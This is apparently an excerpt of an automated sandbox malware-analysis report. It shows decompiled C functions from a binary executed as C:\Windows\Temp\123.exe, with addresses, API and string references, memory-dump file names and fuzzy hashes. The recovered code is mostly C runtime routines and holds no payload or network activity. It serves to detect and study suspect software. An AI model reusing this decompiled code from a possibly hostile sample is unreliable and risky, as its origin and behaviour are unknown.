				if(_t83 < 0 || _t83 == 1 || _t83 > 0x24) {
					_t43 = _a8;
					__eflags = _t43;
					if(_t43 != 0) {
						 *_t43 = _t63;
					}
					goto L52;
				} else {
					if(_t83 <= 0) {
						_t45 =  *_t87;
						__eflags = _t45 - 0x30;
						if(_t45 == 0x30) {
							_t46 = _t87[1];
							__eflags = _t46 - 0x78;
							if(_t46 == 0x78) {
								L26:
								_t83 = 0x10;
								L27:
								_t87 =  &(_t87[2]);
								L28:
								_v20 = _t83;
								_v16 = _t87;
								L24:
								_t45 =  *_t87;
								if(_t45 == 0x30) {
									L23:
									_t87 =  &(_t87[1]);
									__eflags = _t87;
									goto L24;
								}
								L25:
								_t67 = 0;
								_v32 = _t87;
								_t65 = 0;
								_v24 = 0;
								_v28 = 0;
								_v5 = 0;
								_t47 = _t45;
								while(1) {
									_v12 = _t67;
									_t69 = E001992E0("0123456789abcdefghijklmnopqrstuvwxyz", E001A0328(_t47), _t83);
									_t90 = _t90 + 0xc;
									if(_t69 == 0) {
										break;
									}
									_t51 = _v12;
									_t79 = "0123456789abcdefghijklmnopqrstuvwxyz";
									_v24 = _v12;
									_v28 = _t65;
									_v5 = _t69 - _t79;
									_t52 = E001982E0(_t83, 0, _t51, _t65);
									_t65 = _t79;
									asm("cdq");
									_t67 = _t52 + _v5;
									asm("adc ebx, edx");
									_t87 =  &(_t87[1]);
									__eflags = _t87;
									_t47 =  *_t87;
								}
								if(_v16 != _t87) {
									_t27 = _t83 + 0x1b4f3c; // 0x10101011
									_t74 = _t87 -  *_t27 - _v32;
									__eflags = _t74;
									if(_t74 < 0) {
										_t85 = _v12;
										L45:
										__eflags = _v6 - 0x2d;
										if(_v6 == 0x2d) {
											_t85 =  ~_t85;
											asm("adc ebx, 0x0");
											_t65 =  ~_t65;
										}
										L47:
										_t75 = _a8;
										__eflags = _t75;
										if(_t75 != 0) {
											 *_t75 = _t87;
										}
										_t44 = _t85;
										L53:
										return _t44;
									}
									__eflags = _t74;
									if(__eflags > 0) {
										L41:
										 *((intOrPtr*)(E0019FD24(__eflags))) = 0x22;
										_t56 = _a16;
										__eflags = _t56;
										if(_t56 != 0) {
											 *_t56 = 1;
										}
										_t85 = _t83 | 0xffffffff;
										_t65 = _t85;
										goto L47;
									}
									_t83 = _v12;
									asm("cdq");
									_t77 = _t83 - _v5;
									_t58 = _t65;
									asm("sbb eax, edx");
									__eflags = _t65 - _t65;
									if(__eflags < 0) {
										goto L41;
									}
									if(__eflags > 0) {
										L39:
										__eflags = E00198320(_t77, _t58, _v20, 0) - _v24;
										if(__eflags != 0) {
											goto L41;
										}
										__eflags = _t79 - _v28;
										if(__eflags == 0) {
											goto L45;
										}
										goto L41;
									}
									__eflags = _t83 - _t77;
									if(__eflags < 0) {
										goto L41;
									}
									goto L39;
								}
								_t78 = _a8;
								if(_t78 != 0) {
									 *_t78 = _a4;
								}
								L52:
								_t44 = 0;
								goto L53;
							}
							__eflags = _t46 - 0x58;
							if(_t46 == 0x58) {
								goto L26;
							}
							_t83 = 8;
							_v20 = _t83;
							_v16 = _t87;
							goto L23;
						}
						_t83 = 0xa;
						_v20 = _t83;
						_v16 = _t87;
						goto L25;
					}
					if(_t83 != 0x10 ||  *_t87 != 0x30) {
						goto L28;
					} else {
						_t61 = _t87[1];
						if(_t61 == 0x78) {
							goto L27;
						}
						if(_t61 != 0x58) {
							goto L28;
						}
						goto L27;
					}
				}
			}

0x0019768b
0x0019768e
0x00197691
0x00197696
0x00197698
0x00197698
0x0019769c
0x001976a1
0x001976a3
0x001976ac
0x001976ad
0x001976b2
0x001976b5
0x001976a8
0x001976a8
0x001976a9
0x00000000
0x001976a9
0x001976b7
0x001976b9
0x001976be
0x001976ca
0x001976ca
0x001976c4
0x001976c4
0x001976c4
0x001976cb
0x001976d0
0x0019783c
0x0019783f
0x00197841
0x00197843
0x00197843
0x00000000
0x001976e8
0x001976ea
0x00197703
0x00197705
0x00197707
0x00197714
0x00197717
0x00197719
0x00197744
0x00197746
0x00197747
0x00197747
0x0019774a
0x0019774a
0x0019774d
0x00197729
0x00197729
0x0019772d
0x00197728
0x00197728
0x00197728
0x00000000
0x00197728
0x0019772f
0x0019772f
0x00197731
0x00197734
0x00197736
0x00197739
0x0019773c
0x0019773f
0x00197780
0x00197782
0x00197797
0x00197799
0x0019779e
0x00000000
0x00000000
0x00197752
0x00197755
0x00197760
0x00197764
0x00197767
0x0019776a
0x00197771
0x00197777
0x00197778
0x0019777a
0x0019777c
0x0019777c
0x0019777d
0x0019777d
0x001977a3
0x001977ba
0x001977c5
0x001977c5
0x001977c8
0x0019781d
0x00197820
0x00197820
0x00197824
0x00197826
0x00197828
0x0019782b
0x0019782b
0x0019782d
0x0019782d
0x00197830
0x00197832
0x00197834
0x00197834
0x00197836
0x00197849
0x0019784d
0x0019784d
0x001977ca
0x001977cc
0x001977fe
0x00197803
0x00197809
0x0019780c
0x0019780e
0x00197810
0x00197810
0x00197816
0x00197819
0x00000000
0x00197819
0x001977d2
0x001977d7
0x001977d8
0x001977da
0x001977dc
0x001977de
0x001977e0
0x00000000
0x00000000
0x001977e2
0x001977e8
0x001977f4
0x001977f7
0x00000000
0x00000000
0x001977f9
0x001977fc
0x00000000
0x00000000
0x00000000
0x001977fc
0x001977e4
0x001977e6
0x00000000
0x00000000
0x00000000
0x001977e6
0x001977a5
0x001977aa
0x001977b3
0x001977b3
0x00197845
0x00197845
0x00000000
0x00197847
0x0019771b
0x0019771d
0x00000000
0x00000000
0x00197721
0x00197722
0x00197725
0x00000000
0x00197725
0x0019770b
0x0019770c
0x0019770f
0x00000000
0x0019770f
0x001976ef
0x00000000
0x001976f6
0x001976f6
0x001976fb
0x00000000
0x00000000
0x001976ff
0x00000000
0x00000000
0x00000000
0x00197701
0x001976ef

APIs

__aulldiv.LIBCMT ref: 001977EF

Strings

0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00197755, 0019778C, 00197791
-, xrefs: 00197820

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: 4cdd960cb388baf0912472d7fa2f71406b1716097c6727dc74b489bb07e03d8b
Instruction ID: 4be01f26b87c52ced8e0e0afbe156f08069b79bec4cbf61c68cb30b700efc39e
Opcode Fuzzy Hash: 4cdd960cb388baf0912472d7fa2f71406b1716097c6727dc74b489bb07e03d8b
Instruction Fuzzy Hash: 8E51F670E2C2459BDF298FAD88997BEBBFAAF45710F15445EE490D72D1C3B08942CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001A2A85 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E001A2A85(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E001AD261(_t48);
						E001ACCA8(_t48, _t57, 0, 0x1f0bd0, 0, 0x1f0bd0, 0x104);
						_t26 =  *0x1f0d04; // 0xcf35c8
						 *0x1f0cf4 = 0x1f0bd0;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x1f0bd0;
							_v20 = 0x1f0bd0;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E001A2D2F(E001A2BBB( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E001A2BBB( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E001ACBD6(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x1f0cf8 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x1f0cfc = _t58;
											L18:
											E001A71B2(_t37);
											_v12 = 0;
											L19:
											E001A71B2(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x1f0cf8 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x1f0cfc = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E0019FD24(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E0019FD24(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E001A013F();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x001a2a85
0x001a2a8e
0x001a2a93
0x001a2a9d
0x001a2aa0
0x001a2abd
0x001a2abe
0x001a2ad1
0x001a2ad6
0x001a2ade
0x001a2ae4
0x001a2ae7
0x001a2ae9
0x001a2af0
0x001a2af0
0x001a2af2
0x001a2af5
0x001a2af8
0x001a2aff
0x001a2b18
0x001a2b1d
0x001a2b1f
0x001a2b40
0x001a2b48
0x001a2b4b
0x001a2b66
0x001a2b69
0x001a2b70
0x001a2b74
0x001a2b76
0x001a2b7d
0x001a2b80
0x001a2b82
0x001a2b84
0x001a2b86
0x001a2b90
0x001a2b90
0x001a2b92
0x001a2b98
0x001a2b9b
0x001a2b9d
0x001a2ba3
0x001a2ba4
0x001a2baa
0x001a2bad
0x001a2bae
0x001a2bb4
0x001a2bb7
0x00000000
0x00000000
0x00000000
0x00000000
0x001a2b88
0x001a2b88
0x001a2b88
0x001a2b8b
0x001a2b8c
0x001a2b8c
0x00000000
0x001a2b88
0x001a2b78
0x00000000
0x001a2b78
0x001a2b50
0x001a2b50
0x001a2b51
0x001a2b56
0x001a2b58
0x001a2b5a
0x001a2b5f
0x001a2b5f
0x00000000
0x001a2b5f
0x001a2b21
0x001a2b26
0x001a2b28
0x001a2b29
0x00000000
0x001a2b29
0x001a2aeb
0x001a2aee
0x00000000
0x00000000
0x00000000
0x001a2aee
0x001a2aa2
0x001a2aa5
0x00000000
0x00000000
0x001a2aa7
0x001a2aae
0x001a2aaf
0x001a2ab1
0x001a2ab6
0x00000000
0x001a2ab6
0x00000000

Strings

C:\Windows\Temp\123.exe, xrefs: 001A2AC8, 001A2ACF, 001A2B05

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Windows\Temp\123.exe
API String ID: 0-3534342833
Opcode ID: 4095ef3e9673660995da10fdddbafc63685e53fa392cd39063b85460990f2709
Instruction ID: 93df3b7fab3f6b2e7ca497269bb5a9821d8431cf3d7b309e3ae1e2acb66a6e9c
Opcode Fuzzy Hash: 4095ef3e9673660995da10fdddbafc63685e53fa392cd39063b85460990f2709
Instruction Fuzzy Hash: 96416A75A00219AFCB26DF9DDC81DAEB7F9EB9A710F1000AAF804D7251D7709E41DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0019B040 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0019B040(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E001B35BB(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0x1c3014;
				E0019B000(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0x1c3014);
				E0019C0DC(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E0019C260(_t77, 0xfffffffe, _t96, 0x1c3014);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E0019C200(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E0019B000(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x1b50ec;
											if(__eflags != 0) {
												_t72 = E001B3150(__eflags, 0x1b50ec);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0x1b50ec; // 0x1997c3
													 *0x1b4134(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E0019C240(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E0019C260(_t64, _t93, _t96, 0x1c3014);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E0019B000(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E0019C220();
										asm("int3");
										_t66 = E0019C277();
										__eflags = _t66;
										if(_t66 != 0) {
											_t67 = E0019B303(_t86);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E0019C2B3();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

0x0019b040
0x0019b047
0x0019b04b
0x0019b04c
0x0019b052
0x0019b05e
0x0019b060
0x0019b066
0x0019b066
0x0019b06f
0x0019b071
0x0019b074
0x0019b077
0x0019b07f
0x0019b084
0x0019b087
0x0019b08a
0x0019b091
0x0019b0ed
0x0019b0f0
0x0019b0f8
0x0019b0ff
0x00000000
0x0019b0ff
0x00000000
0x0019b093
0x0019b093
0x0019b099
0x0019b09f
0x0019b0a5
0x0019b110
0x0019b119
0x0019b0a7
0x0019b0a7
0x0019b0a7
0x0019b0ad
0x0019b0b0
0x0019b0b3
0x0019b0b6
0x0019b0b9
0x0019b0be
0x0019b0d4
0x00000000
0x0019b0c0
0x0019b0c0
0x0019b0c2
0x0019b0c7
0x0019b0c9
0x0019b0cc
0x0019b0ce
0x0019b0e4
0x0019b104
0x0019b104
0x0019b108
0x00000000
0x0019b0d0
0x0019b0d0
0x0019b11a
0x0019b11d
0x0019b123
0x0019b125
0x0019b12c
0x0019b133
0x0019b138
0x0019b13b
0x0019b13d
0x0019b13f
0x0019b14c
0x0019b152
0x0019b154
0x0019b157
0x0019b157
0x0019b15a
0x0019b15a
0x0019b12c
0x0019b160
0x0019b162
0x0019b167
0x0019b16a
0x0019b16d
0x0019b175
0x0019b179
0x0019b17e
0x0019b17e
0x0019b181
0x0019b185
0x0019b188
0x0019b195
0x0019b198
0x0019b19d
0x0019b19e
0x0019b1a3
0x0019b1a5
0x0019b1aa
0x0019b1af
0x0019b1b1
0x0019b1bc
0x0019b1b3
0x0019b1b3
0x00000000
0x0019b1b3
0x0019b1a7
0x0019b1a7
0x0019b1a7
0x0019b1a9
0x0019b1a9
0x0019b0d2
0x00000000
0x0019b0d2
0x0019b0d0
0x0019b0ce
0x00000000
0x0019b0d7
0x0019b0d7
0x0019b0d9
0x0019b0e0
0x00000000
0x0019b0e2
0x00000000
0x0019b0e0
0x0019b0a5
0x00000000

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0019B07F
__IsNonwritableInCurrentImage.LIBCMT ref: 0019B133

Strings

csm, xrefs: 0019B11D

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: e61682455161750923e6ce5bf87b89556e08302eba97a87df9fce1e02108fdb1
Instruction ID: 3786662659a7338f03d1f1170dee55e8dd7b9e6b551dfe2b91049df111d50acb
Opcode Fuzzy Hash: e61682455161750923e6ce5bf87b89556e08302eba97a87df9fce1e02108fdb1
Instruction Fuzzy Hash: 8B41B134A04208ABCF10DF68E9D5A9EBBB5FF45314F188165F8259B392D731EA11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0019B94D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E0019B94D(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_t75 = E0019B22C(_t96, __ecx, __edx, _t113, _t121, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E0019B22C(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E001994C6(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E001993F9(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E0019B528(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E001A24F9(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x0019b94d
0x0019b94d
0x0019b954
0x0019b95d
0x0019ba7c
0x0019b963
0x0019b965
0x0019b96f
0x0019b972
0x0019b978
0x0019b982
0x0019b9a7
0x0019b9ac
0x0019b9b1
0x0019ba78
0x00000000
0x0019ba79
0x0019b9b1
0x0019b982
0x0019b9b7
0x0019b9ba
0x0019b9bd
0x0019b9c3
0x0019b9c9
0x0019b9db
0x0019b9e0
0x0019b9e3
0x0019b9e6
0x0019b9e9
0x0019b9ec
0x0019b9f2
0x0019b9f8
0x0019b9fb
0x0019b9fe
0x0019ba0d
0x0019ba0e
0x0019ba0e
0x0019ba13
0x0019ba26
0x0019ba28
0x0019ba2d
0x0019ba38
0x0019ba3a
0x0019ba3c
0x0019ba58
0x0019ba5d
0x0019ba60
0x0019ba60
0x0019ba38
0x0019ba2d
0x0019ba66
0x0019ba67
0x0019ba6a
0x0019ba6d
0x0019ba70
0x0019ba73
0x0019b9fe
0x00000000
0x0019b9f2
0x0019ba7d
0x0019ba82
0x0019ba86
0x0019ba89
0x0019ba8a
0x0019ba8b
0x0019ba8c
0x0019ba91
0x0019bb09
0x0019bb0b
0x0019ba93
0x0019ba93
0x0019ba99
0x00000000
0x0019ba9b
0x0019ba9e
0x0019baa1
0x0019baa8
0x0019baab
0x0019baaf
0x0019bae1
0x0019bae4
0x0019baeb
0x0019baf1
0x0019bafb
0x0019bb04
0x0019bb04
0x0019bafb
0x0019baf1
0x0019bb05
0x0019bab1
0x0019bab1
0x0019bab1
0x0019bab4
0x0019bab4
0x0019bab8
0x00000000
0x00000000
0x0019babc
0x0019bad0
0x0019bad0
0x0019babe
0x0019babe
0x0019bac4
0x00000000
0x0019bac6
0x0019bac6
0x0019bac9
0x0019bace
0x00000000
0x00000000
0x00000000
0x00000000
0x0019bace
0x0019bac4
0x0019bad9
0x0019badb
0x00000000
0x0019badd
0x0019badd
0x0019badd
0x00000000
0x0019badb
0x0019bad4
0x0019bad6
0x00000000
0x0019bad6
0x00000000
0x00000000
0x00000000
0x0019baa1
0x0019ba99
0x0019bb0c
0x0019bb10
0x0019bb10

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0019B972

Strings

MOC, xrefs: 0019B984
RCC, xrefs: 0019B98C

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 6bd399f8ab9b5ac4ffe5f4b3d3007646c0669fb48cf6066c65ab446c3e8ea576
Instruction ID: 8091829689eeaf81a241770e96aee7690aa7b6702170737858565b76498d9e66
Opcode Fuzzy Hash: 6bd399f8ab9b5ac4ffe5f4b3d3007646c0669fb48cf6066c65ab446c3e8ea576
Instruction Fuzzy Hash: 5A416572904209EFCF16CF98EEC1AAEBBB5FF48304F188159FA04A7221D3359A50DB50

Uniqueness

Uniqueness Score: -1.00%

Function 001916B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E001916B9(void* __ebx, signed int* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v0;
				signed int _t37;
				signed int* _t55;
				signed int* _t70;
				signed int* _t71;

				_t53 = __ecx;
				_t70 = __ecx;
				E00195D4D(__ecx, 0);
				__ecx[1] = 0;
				__ecx[2] = 0;
				__ecx[3] = 0;
